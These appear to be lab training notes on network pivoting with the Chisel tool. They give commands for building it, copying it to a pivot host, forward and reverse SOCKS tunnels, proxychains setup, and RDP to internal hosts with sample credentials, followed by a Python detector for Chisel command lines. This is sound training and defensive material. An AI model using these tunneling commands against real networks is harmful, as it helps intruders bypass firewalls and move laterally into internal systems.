Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH.

Chisel can create a client-server tunnel connection in a firewall-restricted environment.

Installing Chisel

git clone https://github.com/jpillora/chisel.git

We will need the programming language Go installed on our system to build the Chisel binary. With Go installed on the system, we can move into that directory and use go build to build the Chisel binary.

cd chisel
go build

Two useful resources to complement this concept are 0xdf's blog post "Tunneling with Chisel and SSF" and IppSec's walkthrough of the box Reddish. IppSec starts his explanation of Chisel, including building the binary and shrinking its size, at the 24:29 mark of his video.

Transferring it to Pivot Host

scp -r chisel/ ubuntu@10.129.202.64:~/

#Running Chisel Server on Pivot Host
./chisel server -v -p 1234 --socks5

#Running Chisel Client on Attack Host
./chisel client -v 10.129.202.64:1234 socks

As you can see in the above output, the Chisel client has created a TCP/UDP tunnel via HTTP, secured using SSH, between the Chisel server and the client, and has started listening on port 1080.

Editing proxychains.conf

We can modify our proxychains.conf file, located at /etc/proxychains.conf, and add port 1080 at the end so that proxychains pivots through the tunnel created between port 1080 and the SSH tunnel.

tail -f /etc/proxychains.conf
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Chisel Reverse Pivot

When the Chisel server has --reverse enabled, remotes can be prefixed with R to denote reversed. The server will listen and accept connections, and they will be proxied through the client, which specified the remote.

Reverse remotes specifying R:socks will listen on the server's default socks port (1080) and terminate the connection at the client's internal SOCKS5 proxy.

#Starting Chisel Server on Attack Host
sudo ./chisel server --reverse -v -p 1234 --socks5

#Starting Chisel Client on Pivot host using R:socks
./chisel client -v 10.10.14.69:1234 R:socks

#Edit proxychains file
tail -f /etc/proxychains.conf

#RDP into Domain Controller
proxychains xfreerdp /v:172.16.7.50 /u:victor /p:pass@123
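
From the defender's side, the forward and reverse invocations above share a recognisable argument shape even when the binary is renamed. The following is an added example (not from the original notes or the Chisel project) that flags that shape in process command lines; the sample lines, the /tmp/updater name and the finding strings are constructed for illustration.

```python
import re
import shlex

# Server address as written on this page: host:port, optionally with a scheme.
HOSTPORT = re.compile(r"^(?:https?://)?[\w.\-]+:\d{1,5}$")

def classify(cmdline):
    """Return (role, findings) if the arguments match the Chisel usage shown on
    this page, else None. The binary name is ignored: it is trivially renamed."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if argv and argv[0] == "sudo":
        argv = argv[1:]
    if len(argv) < 2:
        return None
    role, args = argv[1], argv[2:]
    flags = {a for a in args if a.startswith("-")}
    positional = [a for a in args if not a.startswith("-")]
    findings = []
    if role == "server":
        if "--socks5" in flags:
            findings.append("server exposes SOCKS5")
        if "--reverse" in flags:
            findings.append("server accepts reverse remotes")
    elif role == "client":
        # Remotes follow the server address; skip flag values that precede it.
        idx = next((i for i, a in enumerate(positional) if HOSTPORT.match(a)), None)
        if idx is None:
            return None
        for remote in positional[idx + 1:]:
            if remote == "socks":
                findings.append("client opens local SOCKS listener")
            elif remote.startswith("R:"):
                findings.append("client requests reverse remote " + remote)
    return (role, findings) if findings else None

# Constructed sample process command lines (not real telemetry).
SAMPLES = [
    "./chisel server -v -p 1234 --socks5",
    "sudo ./chisel server --reverse -v -p 1234 --socks5",
    "./chisel client -v 10.129.202.64:1234 socks",
    "/tmp/updater client -v 10.10.14.69:1234 R:socks",  # hypothetical renamed binary
    "redis-cli client list",                             # benign
    "python3 -m http.server 8000",                       # benign
]

def scan(lines):
    return [(line, hit) for line in lines if (hit := classify(line))]
```

Calling scan(SAMPLES) returns the four Chisel-shaped lines and skips the two benign ones. In practice the same check would run over process-creation events such as auditd execve records or Sysmon Event ID 1.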